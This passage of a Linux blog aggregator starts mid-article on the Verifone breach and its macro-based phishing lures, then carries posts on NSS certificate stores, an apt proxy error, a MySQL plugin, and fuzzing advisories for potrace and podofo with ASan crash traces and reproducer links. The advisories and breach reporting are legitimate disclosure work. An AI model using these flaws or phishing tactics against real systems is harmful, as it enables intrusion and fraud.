The card associations often require companies that handle credit cards to undergo a third-party security audit, but only if there is evidence that customer card data was compromised. That evidence usually comes in the form of banks reporting a pattern of fraud on customer cards that were all used at a particular merchant during the same time frame. However, those reports come slowly — if at all — and often trickle up to the card brands weeks or months after stolen cards end up for sale in bulk on the cybercrime underground.

Corporate network compromises or the theft of proprietary source code (e.g. the same code that goes on merchant payment devices) generally do not trigger a mandatory third-party investigation by a security firm approved by the card brands, Litan said, although she noted that breaches which can be shown to have a material financial impact on the company need to be disclosed to investors and securities regulators.

“There’s no rule anywhere that says you have to disclose if your software’s source code is stolen, but there should be,” Litan said. “Typically, when a company has a breach of their corporate network you think it might hurt the company, but in a case when the company’s software is stolen and that software is used to transmit credit card data then everyone else is hurt.”

LOW-HANGING FRUIT

Litan said if the attackers who broke into Verifone were indeed targeting payment systems in the filling station business, they were going after the lowest of the low-hanging fruit. The fuel station industry is chock-full of unattended, automated terminals that have special security dispensation from Visa and Mastercard: Fuel station owners have been given more time than almost any other industry to forestall costly security upgrades for new card terminals at gas pumps that are capable of reading more secure chip-enabled credit and debit cards.

The chip cards are an advancement mainly because they are far more difficult and costly for thieves to counterfeit or clone for use in face-to-face transactions — by far the most profitable form of credit card fraud (think gift cards and expensive gaming consoles that can easily be resold for cash).

After years of lagging behind the rest of the world — the United States is the last of the G20 nations to move to chip cards — most U.S. financial institutions are starting to issue chip-based cards to customers. However, many retailers and other card-accepting locations have been slow to accept chip-based transactions even though they already have the hardware in place to accept chip cards (this piece attempts to explain the “why” behind that slowness).

In contrast, chip-card readers are still a rarity at fuel pumps in the United States, and Litan said they will continue to be for several years. In December 2016, the card associations announced they were giving fuel station owners until 2020 to migrate to chip-based readers.

Previously, fuel station owners that didn’t meet the October 2017 deadline to have chip-enabled readers at the pump would have been on the hook to absorb 100 percent of the costs of fraud associated with transactions in which the customer presented a chip-based card but was not asked or able to dip the chip. Now that they have another three years to get it done, thieves will continue to attack fuel station dispensers and other unattended terminals with skimmers and by attacking point-of-sale terminal hardware makers, integrators and resellers.

HOW WOULD YOUR EMPLOYER FARE?

My confidential source on this story said the closest public description of the email phishing schemes used by the Russian crime group behind both the MICROS and Verifone hacks comes in a report earlier this year from Trustwave, a security firm that often gets called in to investigate third-party data breaches. In that analysis, Trustwave describes an organized crime gang that routinely sets up phony companies and corresponding fake Web sites to make its targeted email phishing lures appear even more convincing.

A phishing lure used in a malware campaign by the same group that allegedly broke into MICROS and Verifone. Source: Trustwave Grand Mars report.
The messages from this group usually include a Microsoft Office (Word or Excel) document that has been booby-trapped with malicious scripts known as “macros.” Microsoft disables macros by default in recent versions of Office, but poisoned document lures often come with entreaties that prompt recipients to override Microsoft’s warnings and enable them manually.

Trustwave’s report cites two examples of this social engineering; one in which an image file is used to obscure a warning sign (see below), and another in which the cleverly-crafted phishing email was accompanied by a phone call from the fraudsters to walk the recipient through the process of manually overriding the macro security warnings (and in effect to launch the malware on the local network).

According to Trustwave, this Russian hacking group prefers to target companies in the hospitality industry, and is thought to be connected to the breaches at a string of hotel chains, including the card breach at Hyatt that compromised customer credit and debit cards at some 250 hotels in roughly 50 countries throughout much of 2015.

In a common attack, the perpetrators would send a phishing email from a domain associated with a legitimate-looking but fake company that was inquiring about spending a great deal of money bringing many important guests to a specific property on a specific date. The emails are often sent to sales and event managers at these lodging facilities, with instructions for checking the attached (booby-trapped) document for specifics about guest and meeting room requirements.

This phishing lure prompts users to enable macros and then launch the malware by disguising it as a message file. Source: Trustwave.
Top

Handling certificates in Gentoo Linux

Postby Sven Vermeulen via Simplicity is a form of art... »

I recently created a new article on the Gentoo Wiki titled Certificates, which talks about how to handle certificate stores on Gentoo Linux. The article (whose name might still change later, because it does not cover everything about certificates, mostly how to handle certificate stores) was inspired by the observation that I had to adjust the certificate stores of Chromium and Firefox separately, even though they both use NSS.

Certificates?

Well, when a secure connection is established from a browser to a site (or in any other interaction that uses SSL/TLS, but let's stick with the browser example for now), part of the exchange is to ensure that the target site is actually the site it claims to be. You don't want someone else to trick you into handing over your e-mail credentials, do you?

To establish this, the certificate presented by the remote site is validated (alongside other handshake steps). A certificate contains a public key, as well as information about what the certificate can be used for, and who (or what) the certificate represents. In case of a site, the identification is (or should be) tied to the fully qualified domain name.

Of course, everyone could create a certificate for accounts.google.com and try to trick you into leaving your credentials. So, part of the validation of a certificate is to verify that it is signed by a third party that you trust to only sign certificates that are trustworthy. And to validate this signature, you hence need the certificate of this third party as well.

So, what about this certificate? Well, turns out, this one is also often signed by another certificate, and so on, until you reach the "top" of the certificate tree. This top certificate is called the "root certificate". And because we still have to establish that this certificate is trustworthy, we need another way to accomplish this.
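To see such a chain in practice, you can ask a site for the certificates it presents (a quick sketch using openssl; accounts.google.com is just the example host used above):

```shell
# Connect and print every certificate the server sends (the leaf first,
# then the intermediates; the root itself usually comes from your own truststore)
openssl s_client -connect accounts.google.com:443 -showcerts </dev/null
```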

Enter certificate stores

The root certificates of these trusted third parties (well, let us call them "Certificate Authorities" from now onward, because they sometimes will lose your trust) need to be reachable by the browser. The location where they are stored is (often) called the truststore (a name I came across when dealing with Java and which stuck).

So, what I wanted to accomplish was to remove a particular CA certificate from the certificate store. I assumed that, because Chromium and Firefox both use NSS as the library to support their cryptographic uses, they would also both use the store location at ~/.pki/nssdb. That was wrong.

Another assumption I had was that NSS also uses /etc/pki/nssdb as a system-wide location. Wrong again (not that NSS doesn't allow this, but it seems that this is very much up to, and often ignored by, the applications that embed NSS).

Oh, and I also assumed that there wouldn't be a hard-coded list in the application. Yup. Wrong again.

How NSS tracks root CAs

Basically, NSS has a hard-coded root CA list inside the libnssckbi.so file. On Gentoo, this file is provided by the dev-libs/nss package. Because the list is hard-coded, it seemed like there was little I could do to remove a certificate from it, yet through the user interfaces offered by Firefox and Chromium I was still able to remove the trust bits from the certificate.

Turns out that Firefox (inside ~/.mozilla/firefox/*.default) and Chromium (inside ~/.pki/nssdb) store the (modified) trust bits in those locations, so that the hard-coded list does not need to be altered if all I want to do is revoke the trust on a specific CA. And it isn't that this hard-coded list is a bad one: Mozilla has a CA Certificate Program which controls the CAs that are accepted into this store.
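For Chromium's store, the same trust-bit change can also be made from the command line with NSS's certutil tool (a sketch, assuming the store lives at ~/.pki/nssdb; "Example CA" stands in for the real certificate nickname):

```shell
# List the certificates, and their trust bits, in the user NSS database
certutil -d sql:$HOME/.pki/nssdb -L

# Show the details of one certificate by its nickname
certutil -d sql:$HOME/.pki/nssdb -L -n "Example CA"

# Drop all trust bits for that CA (",," = no trust for SSL, e-mail or code signing)
certutil -d sql:$HOME/.pki/nssdb -M -n "Example CA" -t ",,"
```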

Still, I find it sad that the system-wide location (at /etc/pki/nssdb) is not used by default as well (or perhaps something is wrong on my system that makes it so). On a multi-user system, administrators who want some control over the certificate stores currently need to either use login scripts to manipulate the user certificate stores, or adapt the user files directly.
Top

Apt: Writing more data than expected

Postby Sebastian Marsching via Open Source, Physics & Politics »

If apt (apt-get, aptitude, etc.) fails with an error message like

Get:1 http://example.com/ubuntu xenial/main amd64 python-tornado amd64 4.2.1-2~ds+1 [275 kB]
Err:1 http://example.com/ubuntu xenial/main amd64 python-tornado amd64 4.2.1-2~ds+1
  Writing more data than expected (275122 > 275100)

but the file in the repository has the expected size, a caching proxy (e.g. Apt-Cacher-NG) might be at fault. This can happen when the package in the repository has been changed instead of releasing a new package with a new version number. This will typically not happen for the official repositories, but it might happen for third-party repositories.

In this case, there are only two solutions: bypass the proxy or remove the old file from the proxy's cache. In the case of Apt-Cacher-NG, this can be achieved by going to the web interface, checking the “Validate by file name AND file directory (use with care)” and “then validate file contents through checksum (SLOW), also detecting corrupt files” options, and clicking “Start Scan and/or Expiration”. This scan should detect the broken packages, which can then be selected by checking “Tag” next to each package and subsequently deleted by clicking “Delete selected files”.
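To bypass the proxy for a single run instead (a sketch; adjust to however the proxy is configured on your system), apt's Acquire::http::Proxy option can be overridden on the command line:

```shell
# Fetch directly, ignoring any proxy configured in /etc/apt/apt.conf.d/
sudo apt-get -o Acquire::http::Proxy="DIRECT" update
sudo apt-get -o Acquire::http::Proxy="DIRECT" install python-tornado
```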
Top

Improving MySQL out of disk space behaviour

Postby Daniël van Eeden via Daniël's Database Blog »

Running out of disk space is something which, of course, should never happen, as we all set up monitoring and alerting and only run well-behaved applications. But when it does happen we want things to fail gracefully.

So what happens when mysqld runs out of disk space?
The answer is: It depends
  1. It might start to wait until disk space becomes available.
  2. It might crash intentionally after a 'long semaphore wait'.
  3. It might return an error to the client (e.g. 'table full').
  4. It might skip writing to the binlog (see binlog_error_action).
What actually happens might depend on the filesystem and OS.

Fixing the disk space issue can be done by adding more space or cleaning up some space. The latter can often be done without the help of the system's administrator.

So I wanted to change the behaviour so that MySQL wouldn't crash or stop responding to read queries, and to also make it possible for a user of the system to clean up data to get back to a normal state.

So I wrote an audit plugin which does this:
  1. The DBA sets the maxdiskusage_minfree variable to a threshold for the minimum amount of MB free.
  2. If the amount of free disk space goes under this threshold:
    1. Allow everything for users with the SUPER privilege
    2. Allow SELECT and DELETE
    3. Disallow INSERT
  3. If the amount of free space goes back to normal: Allow everything again
This works, but only if you delete data and then run optimize table to actually make the free space available for the OS.

Note that DELETE can actually increase disk usage because of binlogs, undo, etc.

The code is available on github: https://github.com/dveeden/mysql_maxdiskusage
Top


potrace: heap-based buffer overflow in bm_readbody_bmp (bitmap_io.c) (incomplete fix for CVE-2016-8698)

Postby ago via agostino's blog »

Description:
potrace is a utility that transforms bitmaps into vector graphics.

A fuzz on 1.14 showed that an overflow previously reported as CVE-2016-8698 was not really fixed. Since there isn’t a public git repository, I uploaded the patch to my ‘poc’ repository on github. The patch was sent by the upstream maintainer, Mr. Peter Selinger.

The complete ASan output:

# potrace $FILE
==7325==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x00000051dc51 bp 0x7ffc766b1a30 sp 0x7ffc766b1a28
READ of size 8 at 0x60200000efd0 thread T0
    #0 0x51dc50 in bm_readbody_bmp /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:754:4
    #1 0x51dc50 in bm_read /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:138
    #2 0x510a45 in process_file /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1058:9
    #3 0x50dd56 in main /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1214:7
    #4 0x7f6c7333e78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #5 0x419b68 in getenv (/usr/bin/potrace+0x419b68)

0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
allocated by thread T0 here:
    #0 0x4d2b25 in calloc /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72
    #1 0x519776 in bm_new /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap.h:121:30
    #2 0x519776 in bm_readbody_bmp /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:574
    #3 0x519776 in bm_read /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:138
    #4 0x510a45 in process_file /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1058:9
    #5 0x50dd56 in main /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1214:7
    #6 0x7f6c7333e78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:754:4 in bm_readbody_bmp
Shadow bytes around the buggy address:
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[01]fa fa fa 04 fa
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7325==ABORTING
Affected version:
1.14

Fixed version:
1.15

Commit fix:
https://github.com/asarubbo/poc/blob/master/00219-potrace-heapoverflow-bm_readbody_bmp-PATCH

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00210-potrace-heapoverflow-bm_readbody_bmp

Timeline:
2017-02-26: bug discovered and reported to upstream
2017-02-28: upstream released a patch
2017-03-03: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:
https://blogs.gentoo.org/ago/2017/03/03/potrace-heap-based-buffer-overflow-in-bm_readbody_bmp-bitmap_io-c-incomplete-fix-for-cve-2016-8698
Top


Swapping the side markers on a 2016+ Honda Civic

Postby Zach via The Z-Issue »

Overall, I’ve been quite happy with my 2017 Honda Civic EX-T. However, there are some cosmetic changes that I personally think make a world of difference. One of them is debadging it (removing the “Civic” emblem from the back). Another area for improvement is to swap out the side markers, which by default (and according to law in most of the United States) are amber in colour. As it is the only area on the car that is that gross yellow/orange colour, I thought that it could be vastly improved by swapping it to either clear or some smoked black look. Initially, I ordered the ASEAN-market OEM Honda clear side markers on eBay. However, I decided that on my White Orchid Pearl Civic, “smoked black” might look better, so I ordered those instead. Here’s a before-and-after:

Following the great instructions provided by a CivicX forum member, I got started. Though his instructions are spot-on, the procedure for swapping to the non-OEM smoked markers was actually a little easier. Basically, step 4 (cutting the tabs on the socket) was unnecessary. So, a simplified and concise list of the steps required for my particular swap is:

  • Turn the wheels inward to give you more room to access the wheel liner
  • Remove the three screws holding the wheel liner
  • Press on the side marker clip that holds it to the body, whilst simultaneously pushing the marker itself outward away from the body
  • Use a very small flat head screwdriver to depress the tab holding the bulb socket to the harness
  • Swap in a new bulb (if you have one, and I can recommend the Philips 194/T10 white LED bulbs, but realise that since they are white, they will not be “street legal” in many municipalities)
  • Test the polarity once you have inserted the bulb by simply turning on your headlights
  • Place the harness/new bulb/socket into the new side marker (noting that one notch is larger than the rest, which may require rotation of the side marker)
  • Align the new side marker accordingly, and make sure that it snaps into place
The only caveat I found is that the marker on the passenger’s side did not seem to want to snap into place as easily as did the one on the driver’s side. It took a little wiggling, and ultimately required me to press more firmly on the marker itself in order to get it to stay put.

For a process that only took approximately 30 minutes, though, I think that the swap made a world of difference to the overall appearance of the car. I also am happy with my choice to use the white LED bulb, as it shows quite nicely through the smoked lens:

Cheers,
Zach
Top

podofo: NULL pointer dereference in PoDoFo::PdfColorGray::~PdfColorGray (PdfColor.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==5815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f025d243787 bp 0x7ffe33517c50 sp 0x7ffe33517be0 T0)
==5815==The signal is caused by a READ memory access.
==5815==Hint: address points to the zero page.
    #0 0x7f025d243786 in PoDoFo::PdfColorGray::~PdfColorGray() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:435:1
    #1 0x52c9b2 in GraphicsStack::TGraphicsStackElement::~TGraphicsStackElement() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:29:11
    #2 0x52c9b2 in __gnu_cxx::new_allocator::destroy(GraphicsStack::TGraphicsStackElement*) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/ext/new_allocator.h:133
    #3 0x52c9b2 in std::deque<GraphicsStack::TGraphicsStackElement, std::allocator >::_M_pop_back_aux() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/deque.tcc:515
    #4 0x52c9b2 in std::deque<GraphicsStack::TGraphicsStackElement, std::allocator >::pop_back() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_deque.h:1459
    #5 0x52c9b2 in std::stack<GraphicsStack::TGraphicsStackElement, std::deque<GraphicsStack::TGraphicsStackElement, std::allocator > >::pop() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_stack.h:218
    #6 0x52c9b2 in GraphicsStack::Pop() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.cpp:48
    #7 0x522031 in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:190:35
    #8 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #9 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #10 0x7f025bd2e61f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #11 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:435:1 in PoDoFo::PdfColorGray::~PdfColorGray()
==5815==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6849

Reproducer:
https://github.com/asarubbo/poc/blob/master/00175-podofo-nullptr-PoDoFo-PdfColorGray-PdfColorGray

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfColorGray::~PdfColorGray (PdfColor.cpp)

Top

podofo: NULL pointer dereference in PoDoFo::PdfXObject::PdfXObject (PdfXObject.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==21036==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fc5cfd94743 bp 0x7ffc1eaffe50 sp 0x7ffc1eaffd40 T0)
==21036==The signal is caused by a READ memory access.
==21036==Hint: address points to the zero page.
    #0 0x7fc5cfd94742 in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*) /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/src/doc/PdfXObject.cpp:264:74
    #1 0x529308 in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/tools/podofocolor/colorchanger.cpp:137:28
    #2 0x523b8d in main /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/tools/podofocolor/podofocolor.cpp:116:12
    #3 0x7fc5cd8d178f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x4300e8 in _start (/usr/bin/podofocolor+0x4300e8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/src/doc/PdfXObject.cpp:264:74 in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*)
==21036==ABORTING
Affected version:
0.9.5

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6848

Reproducer:
https://github.com/asarubbo/poc/blob/master/00214-podofo-nullptr-PdfXObject-cpp

Timeline:
2017-03-01: bug discovered
2017-03-02: bug reported upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfXObject::PdfXObject (PdfXObject.cpp)

Top

podofo: NULL pointer dereference in PoDoFo::PdfVariant::DelayedLoad (PdfVariant.h)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==5768==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f6504f1742c bp 0x7fffc41a0df0 sp 0x7fffc41a0d00 T0)
==5768==The signal is caused by a READ memory access.
==5768==Hint: address points to the zero page.
    #0 0x7f6504f1742b in PoDoFo::PdfVariant::DelayedLoad() const /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:545:10
    #1 0x7f6504f1742b in PoDoFo::PdfVariant::GetArray() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:795
    #2 0x7f6504f1742b in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfXObject.cpp:264
    #3 0x51ff55 in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:137:28
    #4 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #5 0x7f650358c61f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #6 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:545:10 in PoDoFo::PdfVariant::DelayedLoad() const
==5768==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6847

Reproducer:
https://github.com/asarubbo/poc/blob/master/00174-podofo-nullptr-PoDoFo-PdfVariant-DelayedLoad

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfVariant::DelayedLoad (PdfVariant.h)

Top

podofo: NULL pointer dereference in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace (graphicsstack.h)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==32192==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000525f24 bp 0x7ffe0a1fdc90 sp 0x7ffe0a1fdc00 T0)
==32192==The signal is caused by a READ memory access.
==32192==Hint: address points to the zero page.
    #0 0x525f23 in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:83:38
    #1 0x525f23 in GraphicsStack::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:129
    #2 0x525f23 in ColorChanger::ProcessColor(ColorChanger::EKeywordType, int, std::vector<PoDoFo::PdfVariant, std::allocator >&, GraphicsStack&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:478
    #3 0x521b3c in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:214:31
    #4 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #5 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #6 0x7fc21680761f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #7 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:83:38 in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace)
==32192==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6846

Reproducer:
https://github.com/asarubbo/poc/blob/master/00173-podofo-nullptr-GraphicsStack-TGraphicsStackElement-SetNonStrokingColorSpace

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace (graphicsstack.h)

Top

podofo: NULL pointer dereference in PoDoFo::PdfColor::operator= (PdfColor.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==9554==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004ca47d bp 0x7fff58eb6bb0 sp 0x7fff58eb6330 T0)
==9554==The signal is caused by a READ memory access.
==9554==Hint: address points to the zero page.
    #0 0x4ca47c in AddressIsPoisoned /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_mapping.h:321
    #1 0x4ca47c in QuickCheckForUnpoisonedRegion /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:43
    #2 0x4ca47c in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #3 0x7f5fc924b58d in PoDoFo::PdfColor::operator=(PoDoFo::PdfColor const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:575:9
    #4 0x52d31f in GraphicsStack::TGraphicsStackElement::operator=(GraphicsStack::TGraphicsStackElement const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:46:29
    #5 0x52d31f in GraphicsStack::TGraphicsStackElement::TGraphicsStackElement(GraphicsStack::TGraphicsStackElement const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:41
    #6 0x52c46a in GraphicsStack::Push() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.cpp:40:27
    #7 0x522005 in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:187:35
    #8 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #9 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #10 0x7f5fc7d3261f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #11 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_mapping.h:321 in AddressIsPoisoned
==9554==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6845

Reproducer:
